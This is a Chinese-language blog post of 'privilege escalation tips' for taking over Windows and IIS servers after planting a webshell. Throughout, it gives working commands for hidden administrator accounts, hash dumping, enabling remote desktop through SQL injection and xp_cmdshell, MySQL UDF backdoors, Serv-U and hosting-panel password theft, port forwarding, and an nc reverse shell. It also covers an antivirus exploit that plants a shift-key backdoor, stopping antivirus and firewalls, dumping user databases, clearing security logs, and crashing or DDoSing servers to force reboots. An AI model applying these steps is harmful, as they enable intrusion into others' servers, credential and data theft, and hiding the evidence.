提權技巧!!!

提權技巧!!!

7 人贊了文章

1.cmd拒絕訪問就自己上傳一個cmd.exe,自己上傳的cmd是不限制後綴的,還可以是cmd.com cmd.txt cmd.rar

2.net user不能執行有時候是net.exe被刪除了,可以先試試net1,不行就自己上傳一個net.exe

3.cmd執行exp沒回顯的解決方法:com路徑那裡輸入exp路徑C:RECYCLERpr.exe,命令那裡清空(包括/c )輸入」net user key daxia /add」

4.有時候因為監控而添加用戶失敗,試試上傳「PwDump7 破解當前管理密碼(hash值)」倆個都上傳,執行PwDump7.exe就可以了,之後解密哈希值得到銘文,建

議重定向結果到保存為1.txt /c c:windows empcookiesPwDump7.exe >1.txt

5.有時候許可權很松,很多命令都可以執行,但是就是增加不上用戶,這時候你就要考慮是不是因為密碼過於簡單或是過於複雜了

6.用wt.asp掃出來的目錄,其中紅色的文件可以替換成exp,執行命令時cmd那裡輸入替換的文件路徑,下面清空雙引號加增加用戶的命令

7.有時候可以添加用戶,但是添加不到管理組,有可能是administrators改名了,net user administrator 看下本地組成員,*administrators

8.有的cmd執行很變態,asp馬里,cmd路徑填上面,下面填:」"c:xxxexp.exe 「whoami」 記得前面加兩個雙引號,不行後面也兩個,不行就把exp的路徑放在

cmd那裡,下面不變

9.當添加不上用戶卻可以添加「增加用戶的Vbs、bat)的時候,就添加一個吧,然後用「直接使伺服器藍屏重啟的東東」讓伺服器重啟就提權成功

10.菜刀執行的技巧,上傳cmd到可執行目錄,右擊cmd 虛擬終端,help 然後setp c:windows empcmd.exe 設置終端路徑為:c:windows empcmd.exe

11.支持aspx但跨不了目錄的時候,可以上傳一個讀iis的vbs,執行命令列出所有網站目錄,找到主站的目錄就可以跨過去了,上傳cscript.exe到可執行目錄,

接著上傳iispwd.vbs到網站根目錄,cmd命令/c 「c:windows empcookiescscript.exe」 d:webiispwd.vbs

11.如何辨別伺服器是不是內網?192.168.x.x 172.16.x.x 10.x.x.x

12.安全狗下加用戶的語句::for /l %i in (1,1,1000) do @net user test test /add&@net localgroup administrators test /add

13.21對應的FTP、1433對應的MSSQL、3306對應的MYSQL、3389對應的遠程桌面、1521對應的Oracle、5631對應的pcanywhere

14.劫持提權,說到這個,想必肯定會想到lpk.dll這類工具,有時候在蛋疼怎麼都加不上賬戶的時候,可以試試劫持shift、添加開機啟動等等思路

15.提權成功但3389埠沒開,執行語句或是工具開3389失敗的時候,可以上傳rootkit.asp,登陸進去就是system許可權,這時候再嘗試開3389希望較大

【常用DOS命令】

查看版本:ver

查看許可權:whoami

查看配置:systeminfo

查看用戶:net user

查看進程:tasklist

查看正在運行的服務:tasklist /svc

查看開放的所有埠:netstat -ano

查詢管理用戶名:query user

查看搭建環境:ftp 127.0.0.1

查看指定服務的路徑:sc qc Mysql

添加一個用戶:net user key key001 /add

提升到管理許可權:net localgroup administrators key /add

添加用戶並提升許可權:net user key key001 /add & net localgroup administrators key /add

查看制定用戶信息:net user key

查看所有管理許可權的用戶:net localgroup administrators

加入遠程桌面用戶組:net localgroup 「Remote Desktop Users」 key /add

突破最大連接數:mstsc /admin /v:127.0.0.1

刪除用戶:net user key /del

刪除管理員賬戶:net user administrator key001

更改系統登陸密碼:net password key001

激活GUEST用戶:net user guest /active:yes

開啟TELNET服務:net start telnet

關閉麥咖啡:net stop 「McAfee McShield」

關閉防火牆:net stop sharedaccess

查看當前目錄的所有文件:dir c:windows

查看制定文件的內容:type c:windows1.asp

把cmd.exe複製到c:windows的temp目錄下並命名為cmd.txt:copy c:windows empcookiescmd.exe c:windows empcmd.txt

開3389埠的命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal」 「Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

查看補丁:dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log

KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i 「%i」||@echo%i Not Installed!)&del /f /q

/a a.txt

【常見殺軟】

360tray.exe 360實時保護

ZhuDongFangYu.exe 360主動防禦

KSafeTray.exe 金山衛士 McAfee McShield.exe 麥咖啡

SafeDogUpdateCenter.exe 伺服器安全狗

【windows提權中敏感目錄和敏感註冊表的利用】

敏感目錄 目錄許可權 提權用途

C:Program Files 默認用戶組users對該目錄擁有查看權 可以查看伺服器安裝的應用軟體 C:Documents and SettingsAll Users「開始」菜單程序 Everyone擁有查看許可權 存放快捷方式,可以下載文件,屬性查看安裝路徑 C:Documents and SettingsAll UsersDocuments Everyone完全控制許可權 上傳執行cmd及exp C:windowssystem32inetsrv Everyone完全控制許可權 上傳執行cmd及exp C:windowsmy.iniC:Program FilesMySQLMySQL Server 5.0my.ini 默認用戶組users擁有查看許可權 安裝mysql時會將root密碼寫入該文件 C:windowssystem32 默認用戶組users擁有查看許可權 Shift後門一般在該文件夾,可以下載後門破解密碼 C:Documents and SettingsAll Users「開始」菜單程序啟動 Everyone擁有查看許可權 可以嘗試向該目錄寫入vbs或bat,伺服器重啟後運行 C:RECYCLERD:RECYCLER Everyone完全控制許可權 回收站目錄。常用於執行cmd及exp C:Program FilesMicrosoft SQL Server 默認用戶組users對該目錄擁有查看許可權 有時候該目錄也存在可執行許可權 C:Program FilesMySQL 默認用戶組users對該目錄擁有查看許可權 找到MYSQL目錄中user.MYD里的root C:oraclexe 默認用戶組users對該目錄擁有查看許可權 可以嘗試利用Oracle的默認賬戶提權 C:WINDOWSsystem32config 默認用戶組users對該目錄擁有查看許可權 嘗試下載sam文件進行破解提權 C:Program FilesGeme6 FTP ServerRemote AdminRemote.ini 默認用戶組users對該目錄擁有查看許可權 Remote.ini文件中存放著G6FTP的密碼 c:Program FilesSecure FTP Server & MFT SoftwareServ-Uc:Program FilesServ-U 默認用戶組users對該目錄擁有查看許可權 ServUDaemon.ini 中存儲了虛擬主機網

站路徑和密碼 c:windowssystem32inetsrvMetaBase.xml 默認用戶組users對該目錄擁有查看許可權 IIS配置文件 C:tomcat5.0conf
esin.conf 默認用戶組users對該目錄擁有查看許可權 Tomat存放密碼的位置 C:KEYSSetup.ini 默認用戶組users對該目錄擁有查看許可權 ZKEYS虛擬主機存放密碼的位置

【提權中的敏感註冊表位置】

HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerMSSQLServerSuperSocketNetLibTcp Mssql埠 HKLMSYSTEMCurrentControlSetControlTerminal Server DenyTSConnections 遠程終端 值為0 即為開啟 HKEY_LOCAL_MACHINESOFTWAREMySQL AB mssql的註冊表位置 HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG 華眾主機註冊表配置位置 HKEY_LOCAL_MACHINESOFTWARECat SoftServ-UDomains1UserList serv-u的用戶及密碼(su加密)位置 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer WinStationsRDP-Tcp 在該註冊表位置PortNumber的值即位3389埠值 HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers mysql管理工具Navicat的註冊表位置,提權運用請谷歌 HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters Radmin的配置文件,提權中常將其導出進行進行覆蓋提權 HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual Roots IIS註冊表全版本泄漏用戶路徑和FTP用戶名漏洞 HKEY_LOCAL_MACHINEsoftwarehzhostconfigSettingsmastersvrpass 華眾主機在註冊表中保存的mssql、mysql等密碼 HKEY_LOCAL_MACHINESYSTEMLIWEIWENSOFTINSTALLFREEADMIN11 星外主機mssql的sa賬號密碼,雙MD5加密 HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual RootsControlSet002 星外ftp的註冊表位置,當然也包括

ControlSet001、ControlSet003

【SQL語句直接開啟3389】

3389登陸關鍵註冊表位置:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections

其中鍵值DenyTSConnections 直接控制著3389的開啟和關閉,當該鍵值為0表示3389開啟,1則表示關閉。

而MSSQL的xp_regwrite的存儲過程可以對註冊進行修改,我們使用這點就可以簡單的修改DenyTSConnections鍵值,從而控制3389的關閉和開啟。

開啟3389的SQL語句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite』HKEY_LOCAL_MACHINE』,SYSTEMCurrentControlSetControlTerminal

Server』,fDenyTSConnections』,REG_DWORD』,0;–

關閉3389的SQL語句: syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite』HKEY_LOCAL_MACHINE』,SYSTEMCurrentControlSetControlTerminal

Server』,fDenyTSConnections』,REG_DWORD』,1;–

2003可以實現一句話開3389: reg add 「HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp」 /v PortNumber /t REG_DWORD /d 80 /f

【wscript.shell的刪除和恢復】

卸載wscript.shell對象,在cmd下或直接運行:regsvr32 /u %windir%system32WSHom.Ocx 卸載FSO對象,在cmd下或直接運行:regsvr32.exe /u %windir%system32scrrun.dll 卸載stream對象,在cmd下或直接運行:regsvr32 /s /u 「C:ProgramFilesCommonFilesSystemadomsado15.dll」 如果想恢復的話只需要去掉/U 即可重新再註冊以上相關ASP組件,這樣子就可以用了

【如何找到準確的終端連接埠?】

在aspx大馬里,點擊「系統信息」第三個就是目前的3389埠

或是執行命令查看正在運行的服務:tasklist /svc

找到:svchost.exe 1688 TermService

記住1688這個ID值,查看開放的所有埠:netstat -ano

找到1688這個ID值所對應的埠就是3389目前的埠

【iis6提權提示Can not find wmiprvse.exe的突破方法】

突破方法一:

在IIS環境下,如果許可權做得不嚴格,我們在aspx大馬裡面是有許可權直接結束wmiprvse.exe進程的,進程查看裡面直接K掉

在結束之後,它會再次運行,這時候的PID值的不一樣的,這時候我們回來去運行exp,直接秒殺。

突破方法二:

虛擬主機,一般許可權嚴格限制的,是沒許可權結束的,這時候我們可以考慮配合其他溢出工具讓伺服器強制重啟,比如「直接使伺服器藍屏重啟的東東」

甚至可以暴力點,DDOS秒殺之,管理髮現伺服器不通了首先肯定是以為伺服器死機,等他重啟下伺服器(哪怕是IIS重啟下)同樣秒殺之。

【本地溢出提權】

計算機有個地方叫緩存區,程序的緩存區長度是被事先設定好的,如果用戶輸入的數據超過了這個緩存區的長度,那麼這個程序就會溢出了.

緩存區溢出漏洞主要是由於許多軟體沒有對緩存區檢查而造成的.

利用一些現成的造成溢出漏洞的exploit通過運行,把用戶從users組或其它系統用戶中提升到administrators組.

想要執行cmd命令,就要wscript.shell組建支持,或是支持aspx腳本也行,因為aspx腳本能調用.net組件來執行cmd的命令.

【Mssql提權】

掃描開放的埠,1433開了就可以找sa密碼提權,用大馬里的搜索文件功能,sa密碼一般在conn.asp config.asp web.config 這三個文件

也可以通過註冊表找配置文件,看下支持aspx不,支持的話跨目錄到別的站點上找,找到之後用aspshell自帶的sql提權登錄再執行命令創建用戶即可。

aspx馬提權執行命令有點不一樣,點擊資料庫管理–選MSSQL–server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB–輸入帳號密碼連接即

增加一個用戶:exec master.dbo.xp_cmdshell 『net user key key001 /add』;– 提升為管理員:exec master.dbo.xp_cmdshell 『net localgroup administrators key /add』;–

PS:如果增加不上,說明是xp_cmdshell組建沒有,增加xp_cmdshell組建命令:Use master dbcc addextendedproc(『xp_cmdshell』,xplog70.dll』)

1433一句話開3389: Exec master.dbo.xp_regwrite』HKEY_LOCAL_MACHINE』,SYSTEMCurrentControlSetControlTerminal

Server』,fDenyTSConnections』,REG_DWORD』,0;–

【mysql提權】

利用mysql提權的前提就是,伺服器安裝了mysql,mysql的服務沒有降權,是默認安裝以系統許可權繼承的(system許可權).並且獲得了root的賬號密碼

如何判斷一台windows伺服器上的mysql有沒有降權? cmd命令net user 如果存在 mysql mssql這樣用戶或者類似的.通常就是它的mssql mysql服務已經被降權運行了

如何判斷伺服器上是否開啟了mysql服務? 開了3306埠,有的管理員會把默認埠改掉.另一個判斷方法就是網站是否支持php,一般支持的話都是用mysql資料庫的.

如何查看root密碼? 在mysql的安裝目錄下找到user.myd這個文件,連接信息就在裡面,一般是40位cmd加密,一些php網站安裝的時候用的是root用戶,在conn.asp config.asp這

些文件里,可以用PHP腳本的文件搜索功能搜索這兩個文件,找到之後編輯就可以找到連接信息,有時會顯得很亂,這時就需要自己去組合,前17位在第一行可以

找到,還有23位在第三行或是其他行,自己繼續找。

可以直接用php腳本里「mysql執行」,或是上傳個UDF.php,如果網站不支持PHP,可以去旁一個php的站,也可以把UDF.php上傳到別的phpshell上也可以。

填入帳號密碼之後,自然就是安裝DLL了,點擊「自動安裝Mysql BackDoor」 顯示導出跟創建函數成功後,緊接著執行增加用戶的命令即可。

PS:5.0版本以下(包括5.0的)默認c:windows系統目錄就可以了,5.1版本以上的不能導出到系統目錄下創建自定義函數,只能導出在mysql安裝目錄下的

lib/plugin目錄中,例如:D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll

【serv-u提權】

這個文件里包含serv-u的md5密碼:C:Program FilesSecure FTP Server & MFT SoftwareServ-U\ServUDaemon.ini

找到這個文件:ServUDaemon.ini 打開找到:LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2

再拿md5密文去解密,再用現在的密碼登陸提權即可。

serv-u提權的前提是43958埠開了,且知道帳號密碼!

如果帳號密碼默認,直接用shell裡面的serv-u提權功能即可搞定,建議用aspx馬、php馬去提權,因為可以看回顯。

530說明密碼不是默認的,回顯330說明成功,900說明密碼是默認的

在程序里找個快捷方式,或是相關的文件進行下載到本地,再查看文件的屬性,就可以找到serv-u的安裝目錄了。

【埠轉發】

什麼情況下適合轉發埠?

1.伺服器是內網,我們無法連接。 2.伺服器上有防火牆,阻斷我們的連接。

轉發埠的前提,我們是外網或是有外網伺服器。

找個可讀可寫目錄上傳lcx.exe

本地cmd命令:lcx.exe -listen 1988 4567 (監聽本地1988埠並轉發到4567埠)

接著shell命令:/c c:windows empcookieslcx.exe -slave 本機ip 1988 伺服器ip 3389 (把伺服器3389埠轉發到本地4567埠)

之後本地連接:127.0.0.1:4567 (如果不想加上:4567的話,本地執行命令的時候,把4567換成3389來執行就行了)

以上是本機外網情況下操作,接著說下在外網伺服器里如何操作:

上傳lxc.exe cmd.exe到伺服器且同一目錄,執行cmd.exe命令:lcx.exe -listen 1988 4567

接著在aspx shell里點擊埠映射,遠程ip改為站點的ip,遠埠程填1988,點擊映射埠,接著在伺服器里連接127.0.0.1:4567就可以了。

【NC反彈提權】

當可以執行net user,但是不能建立用戶時,就可以用NC反彈提權試下,特別是內網伺服器,最好用NC反彈提權。

不過這種方法, 只要對方裝了防火牆, 或是屏蔽掉了除常用的那幾個埠外的所有埠,那麼這種方法也失效了….

找個可讀可寫目錄上傳nc.exe cmd.exe

-l 監聽本地入棧信息

-p port打開本地埠

-t 以telnet形式應答入棧請求

-e 程序重定向

本地cmd執行:nc -vv -l -p 52 進行反彈

接著在shell里執行命令:c:windows emp
c.exe -vv 伺服器ip 999 -e c:windows empcmd.exe 最好是80或8080這樣的埠,被防火牆攔截的幾率小

很多

執行成功後本地cmd命令:cd/ (只是習慣而已)

接著以telnet命令連接伺服器:telnet 伺服器ip 999

回車出現已選定伺服器的ip就說明成功了,接著許可權比較大了,嘗試建立用戶!

PS:一般這樣的格式執行成功率很小,不如直接在cmd那裡輸入:c:windows emp
c.exe 命令這裡輸入:-vv 伺服器ip 999 -e c:windows empcmd.exe

這個技巧成功率比上面那個大多了,不單單是nc可以這樣,pr這些提權exp也是可以的

【星外提權】

如何知道是不是星外主機?

第一:網站物理路徑存在「freehost」 第二:asp馬里點擊程序,存在「7i24虛擬主機管理平台」「星外主機」之類的文件夾

默認帳號:freehostrunat 默認密碼:fa41328538d7be36e83ae91a78a1b16f!7

freehostrunat這個用戶是安裝星外時自動建立的,已屬於administrators管理組,而且密碼不需要解密,直接登錄伺服器即可

(ee.exe提權法)

找個可讀可寫目錄上傳ee.exe

cmd命令:/c c:windows empcookiesee.exe -i (獲取星外帳號的id值,例如回顯:FreeHost ID:724)

接著命令:/c c:windows empcookiesee.exe -u 724 (獲取星外的帳號密碼)

(vbs提權法)

找個可讀可寫目錄上傳cscript.exe和iispwd.vbs

cmd執行:/c 「c:windows empcookiescscript.exe」 c:windows empcookiesiispwd.vbs

意思是讀取iis,這樣一來,不但可以獲取星外的帳號密碼,還可以看到同伺服器上的所有站點的目錄

【360提權】

找個可讀可寫目錄上傳360.exe

cmd命令:/c c:windows empcookies360.exe

會提示3段英文: 360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2 You will get a Shift5 door! Shift5 Backdoor created! 這是成功的徵兆,接著連接伺服器連按5下shift鍵,將彈出任務管理器,點擊新建任務:explorer.exe 會出現桌面,接下來大家都會弄了……

【華眾虛擬主機提權】

就經驗來說,一般溢出提權對虛擬主機是無果的,而且華眾又沒有星外那麼明顯的漏洞

所以華眾提權關鍵之處就是搜集信息,主要註冊表位置:

HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmysqlpass root密碼 HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmssqlpss sa 密碼

c:windows emp 下有hzhost主機留下的ftp登陸記錄有用戶名和密碼

以上信息配合hzhosts華眾虛擬主機系統6.x 破解資料庫密碼工具使用

百度搜索:hzhosts華眾虛擬主機系統6.x 破解資料庫密碼工具

【脫庫】

Access資料庫脫庫很簡單,直接下載資料庫即可,mssql資料庫可以用shell自帶的脫褲功能,找到資料庫的連接信息,一般在web.config.asp里,然後連接一

下SA,找到會員表(UserInfo)就可以了。

mysql資料庫脫庫,找到root帳號密碼,用PHP大馬自己帶鏈接功能連接一下,也自己自己上傳PHP脫褲腳本,之後找到目標資料庫(資料庫名),再找到會員表

menber進行脫褲即可。

【伺服器安全】

命令提示符已被系統管理員停用? 解決方法:運行→gpedit.msc→用戶配置→管理模板→系統,在右側找到」阻止命令提示符」, 然後雙擊一下,在」設置」裡面選中」未配置」 ,最後點擊」確定」。

如何判斷伺服器的類型? 解決方法:直接ping伺服器ip,看回顯信息進行判斷

TTL=32 9X/ME

TTL=64 linux

TTL=128 2000X/XP

TTL=255 UNIX

為什麼有時3389開放卻不能連接? 原因分析:有時候是因為防火牆,把3389轉發到其他埠就可以連接了,有的轉發後依然是連接不上,那是因為管理員在TCP/IP里設置的埠限制 解決方法:我們需要把埠轉為TCP/IP里設置的只允許連接的埠其中一個就可以了,更好的辦法是取消埠限制。

最簡單的往伺服器上傳東西方法是什麼? 本機打開「HFS網路文件伺服器」這款工具,把需要上傳的工具直接拖進左邊第一個框內,複製上面的地址,到伺服器里的瀏覽器訪問,就可以下載了

限制「命令提示符」的運行許可權? 我的電腦(右鍵)–資源管理器中–點擊「工具」按鈕,選擇「文件夾選項」,切換到「查看」標籤,去掉「使用簡單文件共享(推薦)」前面的鉤,這一步是為

了讓文件的屬性菜單中顯示「安全」標籤,然後進入「c:windowssystem32」,找到「cmd.exe」,點右鍵選擇「屬性」,切換到「安全」標籤,將其中「組

或用戶名稱」中除了管理員外的所有用戶都刪除,完成後點「確定」這樣當普通用戶想運行「命令提示符」的時候將會出現「拒絕訪問」的警告框。

如何更改windows2003最大連接數? windows2003中的遠程桌面功能非常方便,但是初始設置只允許2個用戶同時登陸,有些時候因為我在公司連接登陸後斷開,同事在家裡用其他用戶登陸後斷開,

當我再進行連接的時候,總是報錯「終端服務超過最大連接數」這時候我和同事都不能登陸,通過以下方法來增加連接數,運行:services.msc,啟用license

logging,別忘了添加完畢後再關閉 License Logging 打開win2k3的控制面板中的「授權」,點「添加許可」輸入要改的連接數

如何清除伺服器里的IP記錄日誌? 1.我的電腦右鍵管理–事件查看器–安全性–右鍵清除所有事件 2.打開我的電腦–C盤–WINDOWS–system32–config–AppEvent.Evt屬性–安全–全部都拒絕 3.Klaklog.evt屬性–安全–全部都拒絕–SecEvent.Tvt屬性–安全–全部都拒絕


推薦閱讀:

王震:信息網路和數據技術的「偵查員」| 「35歲以下科技創新35人」中國榜單專欄
面向智能機器人的通訊安全機制研究與改進
Wi-Fi定位挾持
sql注入關鍵字!!!
《工業控制系統信息安全防護指南》解讀

TAG:滲透測試 | Web安全測試 | 信息網路安全 |